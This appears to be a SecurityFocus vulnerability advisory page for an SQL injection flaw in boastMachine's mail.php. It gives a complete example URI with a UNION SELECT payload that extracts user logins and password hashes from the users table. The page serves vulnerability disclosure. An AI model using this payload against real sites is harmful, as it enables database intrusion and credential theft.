Search: Home Bugtraq Vulnerabilities Mailing Lists Jobs Tools Vista

RETIRED: boastMachine 'mail.php' SQL Injection Vulnerability

An attacker can exploit this issue via a browser.

The following example URI is available:

http://www.example.com/[path]/mail.php?action=R3d.W0rm&blog=1&id=-99999'+union+select+0,1,concat_ws(0x7c,user_login,user_pass),3+from+bmc_users/*







 

Privacy Statement
Copyright 2008, SecurityFocus